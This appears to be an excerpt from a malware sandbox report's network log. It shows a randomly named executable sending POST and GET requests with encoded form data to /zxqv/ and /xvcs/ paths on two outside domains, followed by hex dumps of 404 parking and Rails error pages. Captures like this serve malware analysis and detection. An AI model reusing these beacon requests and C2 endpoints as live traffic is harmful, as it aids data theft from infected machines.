                                  May 27, 2024 12:37:00.435862064 CEST1123INData Raw: 95 04 2e 11 aa 62 ba 11 b5 0f 14 ce e2 bc 95 a9 ce d7 8f 4c 7d 9d 8c 85 2b 8d 96 d3 99 3b ce a6 0c 04 dd 03 84 b8 62 c5 45 f7 68 80 0b 27 f3 77 23 15 8c d7 94 0b ea f7 83 73 ae 5b 11 65 59 16 d5 e9 d9 48 8a 0d 3f 80 bc 34 86 83 fe 27 56 f0 af ae
                                  Data Ascii: .bL}+;bEh'w#s[eYH?4'V3]uJ'?fyutlEIw^WWUs3B~uPQ.UXsG_]412p:8/,:Kv\nP.9.tg'|u|Iv#J'.O$


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  47192.168.2.749758194.58.112.174806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:03.757096052 CEST1793OUTPOST /zxqv/ HTTP/1.1
                                  Host: www.theppelin.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.theppelin.online
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.theppelin.online/zxqv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 44 73 50 39 48 41 66 68 73 4f 78 58 35 75 31 6d 76 4d 6e 5a 6b 64 70 57 41 75 33 6a 76 4f 4d 37 68 48 34 6a 4d 59 2f 6c 42 6f 65 2f 45 70 66 36 58 65 55 5a 68 6c 67 38 75 43 65 76 74 30 51 6d 59 6b 49 5a 31 57 61 75 74 70 79 6d 78 39 6f 66 66 66 55 2b 66 52 62 7a 59 73 51 73 34 67 72 50 67 77 79 30 58 46 6d 59 74 72 76 6f 47 57 6b 55 6a 34 44 68 53 72 52 50 69 4d 38 6d 65 2f 57 6b 2f 73 73 57 53 38 6b 49 4e 37 79 2b 2f 64 73 57 35 69 6d 4f 50 31 2f 62 55 4f 62 31 37 65 4c 42 61 43 7a 69 58 6e 32 7a 71 6d 36 79 57 47 61 56 6c 50 4a 4f 7a 6b 73 6c 77 35 36 66 55 66 5a 45 48 65 44 39 36 55 58 6e 30 5a 52 56 69 78 65 53 56 63 71 4f 52 30 61 71 6e 6a 2f 4f 58 64 48 4f 6d 58 4f 33 70 6c 6a 49 4f 58 55 2f 74 64 79 58 49 64 46 32 53 4d 71 32 42 42 4b 79 70 34 41 58 4e 2f 4c 72 6f 6c 2f 77 77 53 38 51 51 57 57 47 6b 46 2b 61 42 5a 61 7a 6d 2b 56 71 7a 4f 71 7a 42 77 6e 4a 68 38 70 6e 75 77 62 57 4d 38 71 71 62 59 63 55 69 46 45 68 42 37 76 62 57 74 2b 6e 33 7a 55 65 30 5a 66 79 2b 79 4f 72 48 6f 6e [TRUNCATED]
                                  Data Ascii: 4h=DsP9HAfhsOxX5u1mvMnZkdpWAu3jvOM7hH4jMY/lBoe/Epf6XeUZhlg8uCevt0QmYkIZ1Wautpymx9offfU+fRbzYsQs4grPgwy0XFmYtrvoGWkUj4DhSrRPiM8me/Wk/ssWS8kIN7y+/dsW5imOP1/bUOb17eLBaCziXn2zqm6yWGaVlPJOzkslw56fUfZEHeD96UXn0ZRVixeSVcqOR0aqnj/OXdHOmXO3pljIOXU/tdyXIdF2SMq2BBKyp4AXN/Lrol/wwS8QQWWGkF+aBZazm+VqzOqzBwnJh8pnuwbWM8qqbYcUiFEhB7vbWt+n3zUe0Zfy+yOrHon28XrLpO9Tg4lyy8LLCwmsdsv9IlVrUt3x7F6lLqqMDbB7MX3BIIGRCrUXALz1R6adk+ndkVN1cshu7Bvr/aNkzIegW4ATooXlSjkSb6ERhBUMK6wgdXLtUCQNl9aTfgJNFKbFcbDtJQWXTSDdzLEymWG/nmJ7CHLSN6EkCgtMyCEV9rgnG5PwSGqEhqxocbmJE5EWnzXZCR8/M9wD5dQXtn/qgNRv9Yiimu6XdwCP/QcpumKIOHnjH2GUacOi2Tg1cYAvCsi4ZtGmn383GfhREF394ClMybonICiv3/vFhkAxblBSuppY8LKW5sZNYY32yxMlDAcU7pYOJXhxnM1bLLRUUnbBSXpgC72djxx9ET0Pm/4bl8DqvZxCmZouRZoYKD8KK73dg9I/IHzya8Z1UAYufU8hI5OBV8BCFtufIChDpaID6heigGgqhSn3yOGBN/j0SBo6ajjnWPFZpK3VY5JRcFTT23A8ZmXu5zfjobKqaQ/mZMWIVSCwcwsOVEQRUFGmpjmqPDcNlWCG3Al6lAVzl5m+mpomxMV5EB+e2BX9M8Vh6gvP3u8mOoYiSDq/eORfJrBGHQkJW5p4ekg4yG2ygipdr+vqUX85adfYrtzB2dP/rZtGcxZajVeoAK/cDYG1M8yFLWphZ5prk0vpphqFgfVbAybFE [TRUNCATED]
                                  May 27, 2024 12:37:04.506792068 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:37:04 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Content-Encoding: gzip
                                  Data Raw: 65 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c 7a 6a 38 54 ae e3 99 be 87 bf aa 6e e9 ba 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 9a 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 c2 b2 70 86 1c 45 be 69 87 21 a6 98 f4 77 b0 8c ac f5 86 84 5c be 67 e2 cf ea 72 49 90 fe a0 ae 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf [TRUNCATED]
                                  Data Ascii: e31Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkzj8Tn:EF){Ja8Q[@mpEi!w\grI*apc-7v\eG4#*WX._nV:H:Q?Lll02 CveQ*dVElg FC6(LA2Zm36ZdVV.cN>t{@c87nrDbl.jx~D"E&GNXw^|]^po~6V{Q4Zjgu-P%?ZT<KNjo4[Yf}f1]jnld-o/,=?@"FaYtm'PZf}oGiUVvw'd>kN|hQ^.@WBJFpVVMPK+B=ec:Ka!Z.!gyD}VwBk)XpKr0\AV[52K(DQ\/9NQ~??NND,OmYhI6Wz3d/QUI5B(0`7G^IrS3^8Zpp(978.S(B&`a2>*8Isb2NaQ)_ [TRUNCATED]
                                  May 27, 2024 12:37:04.506812096 CEST1236INData Raw: a7 ed d3 59 27 e6 2f 10 ac 6b 0c e0 cf 8e d7 72 d5 46 64 68 df c6 84 51 e0 7b dd a7 1b 05 6c 0c b8 db 14 cc fe 05 f4 22 72 41 bd 8f e3 7b c0 19 8f 30 c5 b3 b3 ce ab 95 13 8e da da e4 b9 24 6d 1f 8c 37 40 ac f4 14 c6 fd 33 22 e0 fd e4 4b b8 c8 e3
                                  Data Ascii: Y'/krFdhQ{l"rA{0$m7@3"K;s*n@S<s)n6FIduzICCw4:In-^`.#AcPH>|XyX!e3|Vh-0=~$Su(A<cCh'~v,"-(I
                                  May 27, 2024 12:37:04.506854057 CEST1236INData Raw: 2a 91 f9 fe 93 88 93 f9 0e b4 a5 a3 b1 c8 53 d2 14 60 9c 80 2f 86 63 b6 23 e7 54 16 c4 47 c1 9d d2 81 62 32 8b e4 99 93 03 ce 8e 0b 07 15 68 8e d4 18 7c fe 08 1c fa 29 07 7d ec 70 19 ea 90 e7 a8 88 bf e1 6e 80 b4 ce 38 40 df 35 ec 9a f3 6d 35 a5
                                  Data Ascii: *S`/c#TGb2h|)}pn8@5m5?Dy\r^L)?AO.-NA-iAH5{b7NjL1D7h*=b=S/!/v,\?-0!xGFBW!*M.b
                                  May 27, 2024 12:37:04.506867886 CEST111INData Raw: 55 58 c8 56 85 5a 1c 33 6c 3a a1 1f 70 11 8f 7b bd 68 64 cf cf 42 18 e7 d1 ce a0 ab 5f af cd 5d c9 16 85 30 2b 93 17 ef dc e8 48 1b 0f ff 7c 38 16 5e f3 9c 95 ed d0 77 47 91 5a 11 74 31 72 d6 38 83 9f e1 95 95 92 90 2e 9e 42 91 23 e8 64 7d 32 29
                                  Data Ascii: UXVZ3l:p{hdB_]0+H|8^wGZt1r8.B#d}2)a:d#I1i)0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  48192.168.2.749759194.58.112.174806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:06.291560888 CEST491OUTGET /zxqv/?4h=OundE2exmel4zoR2h8DaiP5rA6rWpfsTmCodHa3wAeftE7HOQeIovEJMwiGRwn5EG1Ay+Vr7sNzWsvI7Z9ouBjSqQ9kX1TTXpDayR3bilNm8LgIuib/ea4tO/6BxMsTG0spQdKgoBIvM&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.theppelin.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:37:07.002167940 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:37:06 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Raw: 32 39 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 74 68 65 70 70 65 6c 69 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 [TRUNCATED]
                                  Data Ascii: 2969<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.theppelin.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg. [TRUNCATED]
                                  May 27, 2024 12:37:07.002228022 CEST224INData Raw: 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f
                                  Data Ascii: v><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.theppelin.online</h1><p c
                                  May 27, 2024 12:37:07.002306938 CEST1236INData Raw: 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0
                                  Data Ascii: lass="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_no
                                  May 27, 2024 12:37:07.002403975 CEST1236INData Raw: 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73
                                  Data Ascii: ng__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nbsp;
                                  May 27, 2024 12:37:07.002415895 CEST1236INData Raw: 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 74 68 65 70 70 65 6c 69 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f
                                  Data Ascii: ttps://www.reg.ru/hosting/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83&nbsp;<s
                                  May 27, 2024 12:37:07.002427101 CEST672INData Raw: 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 64 65 73 63 72 69 70
                                  Data Ascii: &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nbsp;
                                  May 27, 2024 12:37:07.002438068 CEST1236INData Raw: 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 9a d0 be d0 bd d1 81 d1 82 d1 80 d1 83 d0 ba d1 82 d0 be d1 80 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83
                                  Data Ascii: -title b-title_size_large-compact"> .</strong><p class="b-text b-parking__promo-description"> &nbsp; &nbsp;
                                  May 27, 2024 12:37:07.002449989 CEST1236INData Raw: 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 74 68 65 70 70 65 6c 69 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 66 73 73 6c 26 72 65 67 5f 73 6f
                                  Data Ascii: utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land_fssl&reg_source=parking_auto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-
                                  May 27, 2024 12:37:07.002460003 CEST1236INData Raw: 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 3d 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 2b 20 27 3f 27 3b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: else { links[ i ].href = links[ i ].href + '?'; } links[ i ].href = links[ i ].href + 'rid=' + data.ref_id; } } } var script = docum
                                  May 27, 2024 12:37:07.002473116 CEST1216INData Raw: 20 20 20 20 20 74 65 78 74 20 3d 20 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 20 74 65 78 74 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 73 5b 20 69 20 5d 5b 20 74 20 5d 20 3d 20 74 65 78 74 3b 0a 20 20
                                  Data Ascii: text = punycode.ToUnicode( text ); spans[ i ][ t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; } } }</script>...


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  49192.168.2.749760216.40.34.41806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:37:12.314450026 CEST748OUTPOST /xvcs/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.botcsllc.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.botcsllc.com/xvcs/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 50 2f 67 59 2f 6c 77 78 4c 68 6d 46 5a 67 59 68 65 52 38 75 54 39 46 4a 63 68 36 36 63 65 43 32 39 46 52 43 34 63 65 62 6f 6f 70 71 2f 72 70 43 55 33 44 45 59 4b 49 56 77 33 44 64 74 61 42 42 53 55 77 4b 32 2f 39 67 45 6e 35 78 71 42 68 4a 76 54 77 45 34 42 6d 66 36 4c 4a 64 4f 2f 64 6a 32 6f 41 48 4b 57 71 39 30 4b 61 76 44 66 53 78 4e 62 48 6d 77 50 6c 41 54 38 73 65 39 47 37 4c 54 65 41 2f 44 67 46 67 56 41 43 56 2b 33 35 73 6b 6a 2f 66 59 71 4e 54 38 68 72 52 45 59 6c 43 6f 75 4f 4c 72 62 4a 45 46 2b 42 65 63 31 35 35 55 34 51 4b 2b 72 4d 75 49 51 50 33 62 6f 74 43 56 74 4e 33 36 6e 55 70 2f 71 6c 42 6f 65 75 71 68 67 3d 3d
                                  Data Ascii: 4h=P/gY/lwxLhmFZgYheR8uT9FJch66ceC29FRC4ceboopq/rpCU3DEYKIVw3DdtaBBSUwK2/9gEn5xqBhJvTwE4Bmf6LJdO/dj2oAHKWq90KavDfSxNbHmwPlAT8se9G7LTeA/DgFgVACV+35skj/fYqNT8hrREYlCouOLrbJEF+Bec155U4QK+rMuIQP3botCVtN36nUp/qlBoeuqhg==
                                  May 27, 2024 12:37:12.848577976 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 1bdc198a-460a-4c1b-9118-0ce778869a37
                                  x-runtime: 0.040465
                                  content-length: 18203
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:37:12.848647118 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 27, 2024 12:37:12.848701000 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 27, 2024 12:37:12.848752022 CEST672INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 27, 2024 12:37:12.848786116 CEST1236INData Raw: 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 64 65 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 68 69 64
                                  Data Ascii: amework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display: block;"> <pre><co
                                  May 27, 2024 12:37:12.848839045 CEST1236INData Raw: 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60 74 61 67 67 65 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74
                                  Data Ascii: (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">acti
                                  May 27, 2024 12:37:12.848870039 CEST1236INData Raw: 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29
                                  Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br>
                                  May 27, 2024 12:37:12.848901987 CEST1236INData Raw: 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 22 20 68 72 65 66 3d 22 23 22 3e 6c 6f 67 72 61 67 65 20 28 30 2e 31 31 2e 32 29 20 6c 69 62 2f 6c 6f 67 72 61 67 65 2f 72 61 69 6c 73 5f 65 78 74 2f 72 61 63
                                  Data Ascii: race-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a
                                  May 27, 2024 12:37:12.848934889 CEST1236INData Raw: 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72
                                  Data Ascii: ="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesuppor
